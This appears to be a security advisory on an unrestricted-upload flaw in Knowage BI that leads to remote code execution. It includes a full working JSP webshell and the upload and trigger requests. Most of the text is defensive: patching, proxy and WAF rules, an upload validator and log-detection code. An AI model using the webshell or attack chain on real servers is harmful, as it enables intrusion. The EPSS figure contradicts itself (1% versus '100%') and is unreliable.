Description
Knowage is an open source analytics and business intelligence suite. Starting in the 6.x.x branch and prior to version 8.1.8, the endpoint `/knowage/restful-services/dossier/importTemplateFile` allows authenticated users to upload `template file` on the server, but does not need any authorization to be reached. When the JSP file is uploaded, the attacker just needs to connect to `/knowageqbeengine/foo.jsp` to gain code execution on the server. By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the `knowageqbeengine` directory and gain code execution capability on the server. This issue has been patched in Knowage version 8.1.8.
EPSS Score:
1%
EUVD-2023-42479 Technical Analysis
Knowage Server Unrestricted File Upload & Remote Code Execution Vulnerability
1. VULNERABILITY ASSESSMENT AND SEVERITY EVALUATION
Severity Classification
CVSS 3.1 Base Score: 10.0 (CRITICAL)
This represents the maximum severity rating, indicating an exceptionally dangerous vulnerability requiring immediate attention.
CVSS Vector Analysis
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Attack Vector (AV:N): Network-exploitable, requiring no physical or local access
- Attack Complexity (AC:L): Low complexity; no specialized conditions required
- Privileges Required (PR:L): Low-level authentication needed (any authenticated user)
- User Interaction (UI:N): No user interaction required for exploitation
- Scope (S:C): Changed scope - impact extends beyond the vulnerable component
- Confidentiality/Integrity/Availability (C:H/I:H/A:H): Complete compromise of all security objectives
Vulnerability Classification
- Type: CWE-434 (Unrestricted Upload of File with Dangerous Type)
- Secondary: CWE-862 (Missing Authorization)
- EPSS Score: 1.0 (100% probability of exploitation in the wild within 30 days)
Critical Assessment
This vulnerability combines two severe security flaws:
- Missing authorization controls on a sensitive file upload endpoint
- Unrestricted file type upload allowing executable JSP files
The combination enables trivial remote code execution (RCE) with minimal prerequisites, making this an extremely high-risk vulnerability.
2. POTENTIAL ATTACK VECTORS AND EXPLOITATION METHODS
Attack Chain
Phase 1: Initial Access
Attacker → Authenticate with low-privilege account → Access vulnerable endpoint
Phase 2: Exploitation
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: target-knowage-server.example.com
Content-Type: multipart/form-data
Authorization: Bearer [LOW_PRIVILEGE_TOKEN]
[Malicious JSP payload]
Phase 3: Code Execution
Access: http://target-knowage-server.example.com/knowageqbeengine/malicious.jsp
Result: Server-side code execution with application privileges
Technical Exploitation Details
Step 1: Obtain Low-Privilege Credentials
- Create legitimate user account
- Compromise existing low-privilege account
- Exploit separate authentication vulnerability
Step 2: Craft Malicious JSP Payload
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(in));
String line;
while((line = reader.readLine()) != null) {
out.println(line);
}
%>
Step 3: Upload via Vulnerable Endpoint
- Target: /knowage/restful-services/dossier/importTemplateFile (no authorization checks performed)
- File uploaded to the knowageqbeengine directory
Step 4: Execute Uploaded Webshell
GET /knowageqbeengine/malicious.jsp?cmd=whoami
Attack Vectors
- Direct RCE: Immediate command execution on the server
- Data Exfiltration: Access to database credentials, business intelligence data
- Lateral Movement: Pivot to internal network resources
- Persistence: Install backdoors, create additional administrative accounts
- Supply Chain Attack: Compromise BI reports distributed to stakeholders
Exploitation Complexity
Difficulty Level: LOW
- No specialized tools required
- Standard HTTP client sufficient
- Publicly documented vulnerability
- Proof-of-concept code likely available
3. AFFECTED SYSTEMS AND SOFTWARE VERSIONS
Vulnerable Versions
- Knowage Server: All versions in the 6.x.x branch through 8.1.7
- Specific Range: 6.0.0 ≤ version < 8.1.8
Affected Components
- Primary: /knowage/restful-services/dossier/importTemplateFile endpoint
- Secondary: knowageqbeengine web application directory
- Framework: Java-based web application (JSP execution environment)
Deployment Scenarios at Risk
- Cloud Deployments
  - AWS, Azure, GCP hosted instances
  - Container deployments (Docker, Kubernetes)
  - SaaS implementations
- On-Premises Installations
  - Enterprise data centers
  - Private cloud environments
  - Hybrid cloud configurations
- Organizational Impact
  - Business Intelligence platforms
  - Analytics dashboards
  - Data warehousing solutions
  - Executive reporting systems
European Sector Exposure
Given Knowage's prevalence in European organizations:
- Financial Services: Banking, insurance analytics
- Healthcare: Medical data analytics (GDPR-sensitive)
- Government: Public sector BI systems
- Manufacturing: Industrial analytics platforms
- Telecommunications: Network analytics
4. RECOMMENDED MITIGATION STRATEGIES
Immediate Actions (Priority 1 - Within 24 Hours)
A. Emergency Patching
# Upgrade to patched version
# Knowage 8.1.8 or later
Upgrade Path:
- Backup current installation and databases
- Review release notes for breaking changes
- Test upgrade in staging environment
- Deploy to production during maintenance window
- Verify patch effectiveness
B. Temporary Workarounds (If immediate patching impossible)
Web Application Firewall (WAF) Rules:
# Block access to vulnerable endpoint
Deny POST /knowage/restful-services/dossier/importTemplateFile
# Monitor and block JSP file uploads
Inspect multipart/form-data for .jsp extensions
Reverse Proxy Configuration (Apache/Nginx):
# Refuse every method on the vulnerable endpoint (prefix match, so sub-paths are covered too)
location /knowage/restful-services/dossier/importTemplateFile {
    return 403;
}
# Refuse .jsp requests under the engine webapp only. A bare "~* \.jsp$" location with an
# "if" inside it would capture every other JSP on the site and serve it from this block.
location ~* ^/knowageqbeengine/.*\.jsp$ {
    return 403;
}
Application-Level Controls:
<!-- web.xml security constraint -->
<security-constraint>
<web-resource-collection>
<web-resource-name>Dossier Upload</web-resource-name>
<url-pattern>/restful-services/dossier/importTemplateFile</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>ADMIN</role-name>
</auth-constraint>
</security-constraint>
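The two controls the web.xml constraint and the patch restore, authorization on the endpoint and a safe handling of the uploaded file, are shown together below as an added Python model of an upload check. It is not Knowage's code: the role name, the permitted template extensions and the storage directory are assumptions.

```python
import posixpath

# Assumed values, not taken from Knowage's code: the roles allowed to import
# dossier templates, the extensions a template may have, and the directory
# templates are written to (kept outside every servlet-served webapp).
ALLOWED_ROLES = {"ADMIN"}
ALLOWED_EXTENSIONS = {".xml", ".json"}
TEMPLATE_DIR = "/var/lib/knowage/dossier-templates"

def check_import_template(user_roles, filename, content):
    """Decide whether an importTemplateFile upload may be stored.

    Returns (True, destination_path) or (False, reason). Each step closes one
    gap named in the advisory: CWE-862 (no authorization) and CWE-434
    (dangerous file type landing where the container executes it)."""
    # 1. Authorization: being authenticated is not enough for this endpoint.
    if not set(user_roles) & ALLOWED_ROLES:
        return False, "forbidden: caller lacks a template-import role"
    # 2. Keep only the base name; never honour client-supplied directories.
    name = posixpath.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        return False, "rejected: empty or traversal file name"
    # 3. Allow-list the extension; a deny-list of .jsp misses .jspx, .war etc.
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "rejected: extension %s not allowed" % (ext or "(none)")
    # 4. Content sanity check: JSP directives/scriptlets have no place in a template.
    if b"<%" in content:
        return False, "rejected: JSP scriptlet markers in template body"
    # 5. Resolve the destination and confirm it is still inside TEMPLATE_DIR.
    dest = posixpath.normpath(posixpath.join(TEMPLATE_DIR, name))
    if posixpath.commonpath([dest, TEMPLATE_DIR]) != TEMPLATE_DIR:
        return False, "rejected: destination escapes the template directory"
    return True, dest
```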
Short-Term Actions (Priority 2 - Within 1 Week)
C. Access Control Hardening
- Implement Role-Based Access Control (RBAC)
  - Restrict file upload capabilities to administrative roles only
  - Review and minimize user privileges
  - Implement principle of least privilege
- Authentication Strengthening
  - Enable multi-factor authentication (MFA)
  - Implement IP whitelisting for administrative functions
  - Review and revoke unnecessary user accounts
D. Network Segmentation
[Internet] → [WAF] → [DMZ - Reverse Proxy] → [Internal Network - Knowage Server]
↓
[Isolated Database Segment]
- Isolate Knowage servers in dedicated network segments
- Implement strict firewall rules
- Monitor east-west traffic
E. Monitoring and Detection
Log Monitoring Rules:
# SIEM detection rules
Alert on:
- POST requests to /dossier/importTemplateFile
- File uploads with .jsp, .jspx, .war extensions
- New files in knowageqbeengine directory
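The first two detection rules above, run over front-end access logs and correlated per client, as an added example (not part of the advisory). It assumes the combined log format of Apache/nginx and that the list of JSP pages legitimately present under the engine webapp is filled in from a clean install; the log lines are constructed.

```python
import re

# Combined log format as written by Apache/nginx (assumed; adapt the regex if your
# front end logs differently).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/knowage/restful-services/dossier/importTemplateFile"
ENGINE_PREFIX = "/knowageqbeengine/"
EXEC_EXT = (".jsp", ".jspx")
# JSP pages that legitimately exist under the engine webapp in your deployment
# (assumed empty here; fill it from a clean install so known pages are not flagged).
KNOWN_ENGINE_PAGES = set()

def analyze(lines):
    """Return (severity, client_ip, detail) findings.
    MEDIUM:   successful POST to the import endpoint (rare in normal use; verify the user)
    HIGH:     request for a .jsp/.jspx under /knowageqbeengine/ not in the baseline,
              even a 404, since that is what probing for a dropped file looks like
    CRITICAL: the same client did both, upload first and JSP request later"""
    findings = []
    uploaders = set()
    for raw in lines:
        m = LOG_RE.match(raw)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # drop the query string
        if method == "POST" and path == UPLOAD_PATH and 200 <= status < 300:
            uploaders.add(ip)
            findings.append(("MEDIUM", ip, "template import by user " + m["user"]))
        elif (path.startswith(ENGINE_PREFIX) and path.lower().endswith(EXEC_EXT)
              and path not in KNOWN_ENGINE_PAGES):
            sev = "CRITICAL" if ip in uploaders else "HIGH"
            findings.append((sev, ip, "unexpected JSP request %s (HTTP %d)" % (path, status)))
    return findings

# Constructed sample lines, not a real capture.
SAMPLE_LOG = [
    '10.0.0.5 - alice [12/Oct/2023:10:00:01 +0000] "POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1" 200 87 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Oct/2023:10:00:09 +0000] "GET /knowageqbeengine/foo.jsp?cmd=whoami HTTP/1.1" 200 412 "-" "curl/8.0"',
    '10.0.0.9 - bob [12/Oct/2023:10:02:00 +0000] "GET /knowage/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Oct/2023:10:03:00 +0000] "GET /knowageqbeengine/x.jspx HTTP/1.1" 404 0 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for sev, ip, detail in analyze(SAMPLE_LOG):
        print(sev, ip, detail)
```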